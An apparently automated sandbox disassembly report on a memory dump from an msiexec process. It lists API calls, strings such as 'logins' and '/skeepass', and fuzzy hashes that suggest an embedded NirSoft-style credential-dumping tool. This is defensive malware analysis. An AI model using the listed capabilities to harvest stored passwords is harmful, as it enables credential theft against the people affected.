                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                      • String ID: logins$null
                                                                                                                                                      • API String ID: 2148543256-2163367763
                                                                                                                                                      • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                      • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                      • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                      • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                      • String ID: ---
                                                                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                                                                      • Opcode ID: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                      • Opcode Fuzzy Hash: 86eb99c19707b425fb2b039d8f5ba7922df37cc2677e68e6646184786069dd0e
                                                                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1010922700-0
                                                                                                                                                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                                                                      • free.MSVCRT ref: 004186C7
                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                      • free.MSVCRT ref: 004186E0
                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                      • free.MSVCRT ref: 00418716
                                                                                                                                                      • free.MSVCRT ref: 0041872A
                                                                                                                                                      • free.MSVCRT ref: 00418749
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                      • String ID: |A
                                                                                                                                                      • API String ID: 3356672799-1717621600
                                                                                                                                                      • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                      • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                                                                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                      • API String ID: 2012295524-70141382
                                                                                                                                                      • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                      • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                      • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                      • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                      • API String ID: 667068680-3953557276
                                                                                                                                                      • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                      • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                      • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                      • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                      APIs
                                                                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1700100422-0
                                                                                                                                                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                      APIs
                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                      APIs
                                                                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                      • String ID: A
                                                                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                      APIs
                                                                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                      • String ID: caption
                                                                                                                                                      • API String ID: 973020956-4135340389
                                                                                                                                                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                                                                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                      APIs
                                                                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                                                                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                      • API String ID: 1284135714-318151290
                                                                                                                                                      • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                                      • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                                      • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
